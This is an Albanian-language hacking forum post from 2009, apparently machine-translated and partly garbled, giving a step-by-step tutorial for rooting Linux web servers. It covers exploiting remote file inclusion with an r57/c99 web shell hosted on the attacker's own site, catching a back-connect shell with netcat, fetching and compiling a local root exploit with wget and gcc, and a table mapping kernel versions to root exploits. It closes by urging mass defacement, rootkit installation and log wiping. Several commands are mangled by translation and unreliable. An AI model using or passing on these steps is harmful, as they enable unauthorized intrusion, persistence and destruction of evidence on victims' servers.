Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi.


ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 R.F.I. Rooting tutorial (Linux Server dhe Safe Mod: OFF)

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: R.F.I. Rooting tutorial (Linux Server dhe Safe Mod: OFF)   Sat Dec 05, 2009 1:38 am

R.F.I. Rooting tutorial (Linux Server dhe Safe Mod: OFF)

njoftim:

Ju do të duhet:

- Pambrojtur i Faqes në R.F.I.
- Shell për R.F.I. (psh: c99, r57 ose të tjera)
- NetCat
- Local Root shfrytëzojnë (në varësi të kernel dhe version)

Ky është qëllimi tutorial për të dhënë një tablo shumë të përgjithshme në procesin e Rooting
Linux në Server me Safe Mod: OFF.

--

Supozoni se ne kemi gjetur një vend me R.F.I. dobësi:

http://www.webi.com/folder/index.html?page =

predhë e drejtuar mund të shfrytëzojnë Remote File Përfshirjes, si më poshtë:

http://www.hackedsite.com/folder/ind...vilscript.txt?

ku evilscript.txt web shell tonë është se ne kemi tashmë i ngarkuar për të
faqen tonë. (www.webiim.com në dosjen: predha)

Pas hyjmë në guaskë, të parë e të gjithë ne do të shohim se versioni i kernel
në krye të faqes, ose nga shtypja: uname - Komanda në një linjë.
Për të vazhduar duhet të lidheni me ne backconnection brenda kutise. Kjo mund të bëhet me
dy mënyra, nëse kemi të përshtatshme shell.

Ne mund të përdorim të Back-Connect moduli i r57/c99 shell apo të ngarkoj një backconnector
të shkruhet në një dosje

Në shumicën e predhave e ka një funksion pa backconnection për ngarkim të
Connect Kthehu Shell (ose një tjetër në Perl shell / c). Ne do të analizojnë e parë
mënyrë e cila është në brendësi të shell (në shembullin tonë është e shell r57).

Fillimisht ne NetCat e hapur për të dëgjuar dhe për t'u dhënë në një port të veçanta (kjo duhet të portit
të jetë korrekt hap / përcillet në NAT / firewall nëse kemi një router) me
mënyrë vijuese:

Ne do të type: 11457 në port input (Ky është default port për versionet e fundit të
e shell r57). Ne mund të përdorim portit dhe të tjera.

Ne shtypi në Windows Start -> Run -> dhe ne type: cmd
Pasi ne do të shkojnë në NetCat directory:

psh :

cd C: \ Program Files \ Netcat

Dhe ne llojin e mëposhtme komandën:

nc-n-l-p-v 11457

NetCat përgjigjur: dëgjim të [çdo] 11457 ...

Në faqen e qendrore shell r57 gjejmë nën menu vijuese::: Net:: dhe
connect-back. Në IP Forma ne do të llojit tonë IP (www.cmyip.com ip tonë për të parë nëse
ne kemi dinamike)

Në formën e Portit ne do ta vëmë që ne u hap portit dhe NetCat dëgjon.

Nëse ne e shtypit të lidhë shell do të përgjigjet:

Tani shkrimit të përpiqet të lidhë <IP here> port 11457 ...

Nëse tonë cilësimet janë të sakta NetCat do të na japin një shell në server

Tani ne Wil të vazhdojë me procesin Rooting.

Ne duhet të gjejmë një dosje të shkruhet në mënyrë që të shkarkoni dhe të përpilojnë Lokale
Root shfrytëzojnë se do të na japin root privilegje në kuti. Në varësi të version
i Linux kernel atje janë të ndryshme shfrytëzon. Disa herë e shfrytëzon dështojnë për të kandiduar
për shkak se disa kuti janë patched ose nuk kemi korrekte permissions.

Lista e shfrytëzon / kernel:


Kodi:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl


Ne mund të gjeni të shkruhet folders / fotografi nga shtypja:

gjeni / -2-permanent-LS

Ne mund të përdorim i / tmp dosje që është një standard të shkruhet folder

Ne type: cd / tmp

Për të shkarkuar lokal shfrytëzuar rrënjët ne mund të përdorni një shkarko komandën për linux si
wget.

Për shembull:

wget http://www.webi/localroot/h00lyshit.c

http://www.webi.com/localroot/h00lyshit.c ku është e url e h00lyshit.

Pas shkarko ne duhet të shfrytëzojnë të përpilojnë (Lexoni udhëzimin e shfrytëzojnë
para se të përpilojnë)

Për ne duhet të h00lyshit type:

gcc h00lyshit.c-o h00lyshit

Tani ne kemi krijuar file e ekzekutueshme: h00lyshit.

Komandën e për të drejtuar këtë është shfrytëzuar:

./h00lyshit <very madh fotografi në disk>

Ne kemi nevojë për një shumë të madhe fotografi në disk, në mënyrë të suksesshme për të drejtuar dhe për të marrë rrënjë.

Ne duhet të krijojë një skedar të madh në / tmp ose të shkruhet në një tjetër dosje.

I komandës është:

nëse dd = / dev / urandom e = largefile count = 2m


ku largefile është filename.

Ne duhet të prisni 2-3 minuta për krijimin fotografi

Nëse kjo komandë nuk mund të përpiqen:

nëse dd = / dev / zero e = / tmp / largefile count = 102400 bs = 1024

Tani ne mund të procced hapi i fundit. Ne mund të drejtuar nga shtypja e shfrytëzuar:

./h00lyshit largefile ose

./h00lyshit / tmp / largefile

(Në qoftë se ne jemi në një dosje të ndryshme të shkruhet dhe është krijuar në largefile / tmp)

Nëse nuk ka running gabime (ndoshta e kernel është patched ose një problem me
shfrytëzojnë të kandidojë ose fotografi të mëdha) do të kemi rrënjë

Për të kontrolluar nëse ne mori root:

id ose

whoami

Nëse ai thotë se ne root root mori!

Tani ne mund të dëmtoj / fshij masive të gjitha faqet e serverit, ose të një rootkit setup (p.sh.
SSHDoor) dhe për të marrë ssh / shell telnet qasje në server.

Ne duhet të heq të gjitha shkrimet në mënyrë që të jenë të sigurt me një regjistër të pastër. Një pastrim i mirë për këtë
punë është e MiG Log Cleaner.
paç fat
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
R.F.I. Rooting tutorial (Linux Server dhe Safe Mod: OFF)
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Tutorials & Mësime-
Kërce tek: